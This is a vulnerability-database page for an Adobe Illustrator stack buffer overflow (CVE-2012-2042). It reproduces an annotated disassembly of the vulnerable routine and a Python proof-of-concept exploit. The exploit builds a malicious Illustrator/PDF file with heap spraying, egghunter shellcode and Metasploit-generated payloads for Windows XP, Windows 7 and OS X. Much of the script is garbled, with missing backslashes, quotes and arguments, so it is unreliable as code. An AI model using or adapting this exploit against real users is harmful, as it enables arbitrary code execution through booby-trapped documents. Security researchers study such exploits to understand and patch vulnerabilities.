Adobe Illustrator缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1172780 漏洞类型 缓冲区溢出
发布时间 2012-05-25 更新时间 2012-05-25
CVE编号 CVE-2012-2042 CNNVD-ID CNNVD-201205-443
漏洞平台 N/A CVSS评分 10.0
####   Felipe Andres Manzano *        ####
The vulnerable function follows...
.text:004A7200 ; =============== S U B R O U T I N E =======================================
.text:004A7200 ; Attributes: bp-based frame
.text:004A7200 sub_4A7200      proc near               
.text:004A7200 var_11C         = dword ptr -11Ch
.text:004A7200 var_118         = dword ptr -118h
.text:004A7200 var_114         = byte ptr -114h
.text:004A7200 var_14          = dword ptr -14h
.text:004A7200 var_10          = dword ptr -10h
.text:004A7200 var_C           = dword ptr -0Ch
.text:004A7200 var_4           = dword ptr -4
.text:004A7200 arg_0           = dword ptr  8
.text:004A7200                 push    ebp
.text:004A7201                 mov     ebp, esp
.text:004A7203                 push    0FFFFFFFFh
.text:004A7205                 push    offset loc_C3B8C0
.text:004A720A                 mov     eax, large fs:0
.text:004A7210                 push    eax
.text:004A7211                 sub     esp, 110h            ;Make room for a 256 bytes buffer, etc 
.text:004A7217                 mov     eax, dword_FB3380    
.text:004A721C                 xor     eax, ebp
.text:004A721E                 mov     [ebp+var_14], eax    ;Cookie! Immediately after the buffer
.text:004A7221                 push    ebx
.text:004A7222                 push    esi
.text:004A7223                 push    edi
.text:004A7224                 push    eax
.text:004A7225                 lea     eax, [ebp+var_C]
.text:004A7228                 mov     large fs:0, eax
.text:004A722E                 mov     [ebp+var_10], esp
.text:004A7231                 mov     ebx, [ebp+arg_0]
.text:004A7234                 mov     edi, ecx
.text:004A7236                 mov     ecx, ebx
.text:004A7238                 mov     [ebp+var_118], ebx
.text:004A723E                 call    std::basic_string::length(...) ;Original size offending size
                                                                      ;(It doesn;t stop at null chars)
.text:004A7244                 mov     esi, eax
.text:004A7246                 push    esi
.text:004A7247                 mov     ecx, ebx
.text:004A7249                 call    std::basic_string::c_str(...)
.text:004A724F                 push    eax
.text:004A7250                 lea     eax, [ebp+var_114]
.text:004A7256                 push    eax
.text:004A7257                 call    memcpy                     ;STACK OVERFLOW! (If more than 256 bytes)
.text:004A725C                 lea     eax, [ebp+esi+var_114]
.text:004A7263                 add     esp, 0Ch
.text:004A7266                 mov     [ebp+var_11C], eax
.text:004A726C                 mov     byte ptr [eax], 0
.text:004A726F                 mov     [ebp+var_4], 0
.text:004A7276                 lea     esi, [ebp+var_114]
.text:004A727C                 lea     esp, [esp+0]
.text:004A7280 loc_4A7280:                             
.text:004A7280                 cmp     esi, eax
.text:004A7282                 jnb     short loc_4A72B6
.text:004A7284                 mov     edx, [edi]
.text:004A7286                 mov     eax, [edx+4]
.text:004A7289                 push    esi
.text:004A728A                 mov     ecx, edi
.text:004A728C                 call    eax                       ;Iterates over the stack copied buffer
                                                                 ;applying a 'locale'? character translation
                                                                 ;(Invalid chars noted in exploit)
.text:004A728E                 test    eax, eax
.text:004A7290                 jg      short loc_4A7297
.text:004A7292                 mov     eax, 1
.text:004A7297 loc_4A7297:                             
.text:004A7297                 add     esi, eax
.text:004A7299                 mov     eax, [ebp+var_11C]
.text:004A729F                 jmp     short loc_4A7280
.text:004A72AE ; ---------------------------------------------------------------------------
.text:004A72AE loc_4A72AE:                             
.text:004A72AE                 mov     ebx, [ebp+var_118]
.text:004A72B4                 jmp     short loc_4A72BD
.text:004A72B6 ; ---------------------------------------------------------------------------
.text:004A72B6 loc_4A72B6:                             
.text:004A72B6                 mov     [ebp+var_4], 0FFFFFFFFh
.text:004A72BD loc_4A72BD:                             
.text:004A72BD                 lea     ecx, [ebp+var_114]
.text:004A72C3                 push    ecx
.text:004A72C4                 mov     ecx, ebx
.text:004A72C6                 call    std::basic_string::operator=(...)   ;Here, due to local values 
                                                                           ;corruption it is possible to
                                                                           ;write a translated version of
                                                                           ;our buffer to anywhere 
.text:004A72CC                 mov     ecx, [ebp+var_C]
.text:004A72CF                 mov     large fs:0, ecx
.text:004A72D6                 pop     ecx
.text:004A72D7                 pop     edi
.text:004A72D8                 pop     esi
.text:004A72D9                 pop     ebx
.text:004A72DA                 mov     ecx, [ebp+var_14]
.text:004A72DD                 xor     ecx, ebp
.text:004A72DF                 call    sub_C27512                           ;Check the cookie
.text:004A72E4                 mov     esp, ebp
.text:004A72E6                 pop     ebp
.text:004A72E7                 retn    4
.text:004A72E7 sub_4A7200      endp


#Exploit PoC begins...
from miniPDF import * #
import zlib,struct,os,optparse,hashlib
from subprocess import Popen, PIPE
#Character translation map for the copied buffer (Reversed from function 004A72F0)
invalid = [ i for i in xrange(0,0xff+1) if cmap[i] != i and i>0x1f]

def getXImage(width, height, fill='x90', tail='xcc'):
        [ a b c d tx ty ] llx lly urx ury h w bits ImageType AlphaChannelCount reserved bin-ascii ImageMask XI
        Arguments to the XI operator specify the location and size of the image, its
        pixel bit depth, color type, and other attributes

        The image matrix maps the unit square of user space, bounded by
        (0, 0) and (1, 1) in user space, to the boundary of the source image in
        image space.

    doc = '''0 A
0 O
0 g
0 J 0 j 1 w 10 M []0 d
0 XR
[$width$ 0 0 $height$ 0 0] 0 0 $width$ $height$ $width$ $height$ 8 1 0 0 $bin_ascii$ 0
%%BeginData: $size$
    bin_ascii = 1 #binary
    doc = doc.replace('$width$','%d'%width)
    doc = doc.replace('$height$','%d'%height)
    doc = doc.replace('$bin_ascii$','%d'%bin_ascii)
    doc = doc.replace('$size$','%d'%(width*height))
    data = (fill*(width*height))
    data = data[:width*height-len(tail)]+tail

    if bin_ascii == 0:
      data = data.encode('hex')
      data_formated = ''
      for i in xrange(0,len(data)+62,62):
        data_formated += '%'+data[i:i+62]+'n'
      data = data_formated
    doc = doc.replace('$data$',data)
    return doc

def makeASCIICode(msfpayload):
  msfpayload = Popen('msfpayload3.5 %s R'%msfpayload, shell=True, stdout=PIPE)
  msfencode  = Popen("msfencode3.5 BufferRegister=EAX -e x86/alpha_mixed -b '%s' -t raw"%''.join(['\x%02x'%x for x in invalid]), 
  code = msfencode.communicate()[0]
  return code
def mkAIPrivate(options):
  baseai = '''
%%Creator: Adobe Illustrator(TM) 3.2
%%AI8_CreatorVersion: 15.0.2
%AI5_FileFormat 11.0
%%For: (Administrator) ()
%%Title: (
%%CreationDate: 1/21/2011 12:32 PM
%%Canvassize: 16383
%%BoundingBox: 29 -389 198 75
%%DocumentProcessColors: Black
%%DocumentFonts: MyriadPro-Regular
%%DocumentNeededFonts: MyriadPro-Regular
%%DocumentNeededResources: procset Adobe_packedarray 2.0 0
%%+ procset Adobe_cshow 1.1 0
%%+ procset Adobe_customcolor 1.0 0
%%+ procset Adobe_typography_AI3 1.0 1
%%+ procset Adobe_pattern_AI3 1.0 0
%%+ procset Adobe_Illustrator_AI3 1.0 1
%AI3_ColorUsage: Color
%AI3_TemplateBox: 298 -421 298 -421
%AI3_TileBox: -8.35986 -816.9453 603.6406 -24.9448
%AI3_DocumentPreview: None
%%PageOrigin:-8 -817
%AI7_GridSettings: 72 8 72 8 1 0 0.8 0.8 0.8 0.9 0.9 0.9
%AI9_Flatten: 1
%AI12_CMSettings: 00.MS
%%IncludeResource: procset Adobe_packedarray 2.0 0
Adobe_packedarray /initialize get exec
%%IncludeResource: procset Adobe_cshow 1.1 0
%%IncludeResource: procset Adobe_customcolor 1.0 0
%%IncludeResource: procset Adobe_typography_AI3 1.0 1
%%IncludeResource: procset Adobe_pattern_AI3 1.0 0
%%IncludeResource: procset Adobe_Illustrator_AI3 1.0 1
%%IncludeFont: MyriadPro-Regular
Adobe_cshow /initialize get exec
Adobe_customcolor /initialize get exec
Adobe_typography_AI3 /initialize get exec
Adobe_pattern_AI3 /initialize get exec
Adobe_Illustrator_AI3 /initialize get exec
39/quotesingle 96/grave 128/Euro 130/quotesinglbase/florin/quotedblbase/ellipsis
/dagger/daggerdbl/circumflex/perthousand/Scaron/guilsinglleft/OE 145/quoteleft
/scaron/guilsinglright/oe/dotlessi 159/Ydieresis /space 164/currency 166/brokenbar
168/dieresis/copyright/ordfeminine 172/logicalnot/hyphen/registered/macron/ring
/plusminus/twosuperior/threesuperior/acute/mu 183/periodcentered/cedilla
/onesuperior/ordmasculine 188/onequarter/onehalf/threequarters 192/Agrave
%AI3_BeginEncoding: _MyriadPro-Regular MyriadPro-Regular
[/_MyriadPro-Regular/MyriadPro-Regular 0 0 1 TZ
%AI3_EndEncoding AdobeType
0 To
1 0 0 1 63.9058 -54.9058 0 Tp
1 0 0 1 63.9058 -54.9058 Tm
0 Tr
0 O
0 0 0 1 k
4 M
/_MyriadPro-Regular 12 Tf
100 Tz
0 Tt
0 0 Tl
0 Tc
($PATTERN$) Tx 1 0 Tk
gsave annotatepage grestore showpage
Adobe_Illustrator_AI3 /terminate get exec
Adobe_pattern_AI3 /terminate get exec
Adobe_typography_AI3 /terminate get exec
Adobe_customcolor /terminate get exec
Adobe_cshow /terminate get exec
Adobe_packedarray /terminate get exec

  #configure token and search code snipet
  token = 0x494c4546

  if options.w7:
    #Win7 In w7 the environment memory is 0x10000bytes long!
    msfpayload = 'windows/exec CMD=calc.exe EXITFUNC=process'
    baseai = baseai.replace('$HEAPSPRAY$','')
    jmp_addr = 0x00001FF01
    write_addr = 0x0001FF01
  elif options.xp:
    msfpayload = 'windows/exec CMD=calc.exe EXITFUNC=process'
    baseai = baseai.replace('$HEAPSPRAY$','')
    jmp_addr = 0x10F00 
    write_addr = 0x10F00
  elif options.osx:
    code = Popen('msfpayload3.5 osx/x86/exec CMD=/Applications/ EXITFUNC=process R', shell=True, stdout=PIPE).communicate()[0]
    baseai = baseai.replace('$HEAPSPRAY$',getXImage(1020,1024,fill='x90',tail='xcc'+code+'xcc')*300 )
    payload = "A"*284
    payload += struct.pack("<L", 0x31000100)
    #Write the string in octal form
    ai_data = baseai.replace('$PATTERN$', ''.join(['\%o'%ord(i) for i in payload]))
    return ai_data
  elif options.multi:
    msfpayload = 'windows/exec CMD=calc.exe EXITFUNC=seh'
    jmp_addr = 0x18e41111
    write_addr = 0xFFFF     #Segfault
    #configure token and search code snipet
    search = 'x80x79xffx01'              #CMP BYTE [ECX-1],1
    search += 'x74x18'                      #JZ fixstack
    search += 'xc6x41xffx01'              #MOV BYTE [ECX-1],1
    search += 'x58'                          #search: pop EAX
    search += 'x3D'+struct.pack('<L',token)  #cmp EAX, $token
    search += 'x75xF8'                      #jnz %search
    search += 'x89xe0'                      #mov eax,esp 
    search += 'x81xec'+struct.pack("<L",0x1000) #sub esp, 0x1000
    search += 'x89xe5'                      #mov ebp,esp
    search += 'xFFxD0'                      #CALL EAX
    ##Second crash fix stack
    # Search for stack signature (Tested in 15.0.0 15.0.1 15.0.2)
    # 00000045
    # 00000001
    # 00000000
    # 00000045
    search +=  'x81xc4'+struct.pack("<L",0x1000) #add esp, 0x1000
    search += 'x58'                  #POP EAX
    search += 'x40'                  #INC EAX
    search += 'x83xF8x46'          #CMP EAX,46
    search += 'x75xF9'              #JNE SHORT loop
    search += 'x58'                  #POP EAX
    search += 'x40'                  #INC EAX
    search += 'x83xF8x02'          #CMP EAX,02
    search += 'x75xF9'              #JNE SHORT loop
    search += 'x58'                  #POP EAX
    search += 'x40'                  #INC EAX
    search += 'x83xF8x01'          #CMP EAX,01
    search += 'x75xF9'              #JNE SHORT loop
    search += 'x58'                  #POP EAX
    search += 'x40'                  #INC EAX
    search += 'x83xF8x46'          #CMP EAX,46
    search += 'x75xF9'              #JNE SHORT loop
    #Fix frame and return
    search += 'x83xECx1C'         #SUB ESP,1C
    search += 'x5d'                 #POP EBP
    search += 'xc3'                 #RET

    baseai = baseai.replace('$HEAPSPRAY$',getXImage(1020,1024,fill='x90',tail=search)*300 )
    def pattern(size):
      def _pattern():
        for i in xrange(ord('a'),ord('z')+1):
          for j in xrange(ord('0'),ord('9')+1):
            for k in xrange(ord('A'),ord('Z')+1):
              for h in xrange(ord('0'),ord('9')+1):
                yield chr(i)
                yield chr(j)
                yield chr(k)
                yield chr(h)
      return  ''.join(list(_pattern())[:size])
    p = pattern(3000)
    ai_data = baseai.replace('($PATTERN$)',  '('+p+')').replace('$HEAPSPRAY$',getXImage(1020,1024)*20)
    return ai_data

 #prepare shellcode..
  if options.payload:
    msfpayload = args[1]

  code = makeASCIICode(msfpayload)

  search = 'x58'                          #search: pop EAX
  search += 'x3D'+struct.pack('<L',token)  #cmp EAX, $token
  search += 'x75xF8'                      #jnz %search
  search += 'x89xe0'                      #mov eax,esp 
  search += 'x89xe5'                      #mov ebp,esp
  search += 'xFFxD0'                      #CALL EAX
  payload =  search 
  payload += 'A'*(268 - len(payload))
  payload += struct.pack('<L',jmp_addr)    #offset 268
  payload += 'B'*(352 - len(payload))
  payload += struct.pack('<L', write_addr) #offset 352 (originally a heap address)
  payload += 'C'*(376 - len(payload))
  payload += struct.pack('<L',token)       #offset 376
  payload += code                          #offset 380

  assert len(payload)<=0x3000, 'Payload too long!, it may hit the end of the stack'
  #Double check it doesn't have invalid chars...
  for c in search:
    assert not ord(c) in invalid, 'c:%s is in %s'%('%02x'%ord(c),['\x%02x'%x for x in invalid])
  #Write the string in octal form
  ai_data = baseai.replace('$PATTERN$', ''.join(['\%o'%ord(i) for i in payload]))

  #ai_data holds the ai private data to we inserted in the pdf shell
  return ai_data

def mkPDFShell(ai_data):
  #The document
  doc = PDFDoc()
  font = PDFDict()
  font.add('Name', PDFName('F1'))
  font.add('Subtype', PDFName('Type1'))
  font.add('BaseFont', PDFName('Helvetica'))
  #name:font map
  fontname = PDFDict()
  resources = PDFDict()
  contents= PDFStream({},'BT /F1 24 Tf 240 700 Td (Pedefe Pedefeito Pedefeon!) Tj ET')
  #begin illustrator bit
  private = PDFDict()
  illustrator = PDFDict()

  #slice the private data in 64k packs
  data = ai_data
  compress = {}
  chunk_size = 0xffff*20
  for i in xrange(0,len(data)/chunk_size+1):
    priv_data = PDFStream({'Filter': '/FlateDecode'},data[chunk_size*i:chunk_size*(i+1)].encode('zlib'))
    hsh = hashlib.md5(
    if not hsh.hexdigest() in compress.keys():
      ref = PDFRef(priv_data)
      compress[hsh.hexdigest()] = ref

  page = PDFDict()
  page.add('Contents', PDFRef(contents))
  page.add('PieceInfo',PDFDict({'Illustrator': PDFRef(illustrator)})) 
  pages = PDFDict()
  pages.add('Type', PDFName('Pages'))
  pages.add('Kids', PDFArray([PDFRef(page)]))
  pages.add('Count', PDFNum(1))
  #add parent reference in page
  catalog = PDFDict()
  catalog.add('Type', PDFName('Catalog'))
  catalog.add('Pages', PDFRef(pages))
  return str(doc)

if __name__ == '__main__':

  parser = optparse.OptionParser(description='Adobe Illustrator File Format Tx operator Stack Overflow')
  parser.add_option('--debug', action='store_true', default=False, help='For debugging')
  parser.add_option('--multi', action='store_true', default=False, help='Heapspraying for multitarget')
  parser.add_option('--w7', action='store_true', default=False, help='For Windows7')
  parser.add_option('--xp', action='store_true', default=False, help='For Windows XP (generic)')
  parser.add_option('--osx', action='store_true', default=False, help='For OSX (tested on plain leopard)')
  parser.add_option('--payload',  action='store_true', default=False, help="Metasploit payload. Ex. 'windows/exec CMD=calc.exe'")
  parser.add_option('--doc', action='store_true', default=False, help='Print detailed documentation')
  (options, args) = parser.parse_args()
  if not options.w7 + options.xp + options.debug + options.multi + options.osx + options.doc== 1:
    print 'Try --help'
  elif options.doc:
    print __doc__

  ai_data = mkAIPrivate(options)
  print mkPDFShell(ai_data)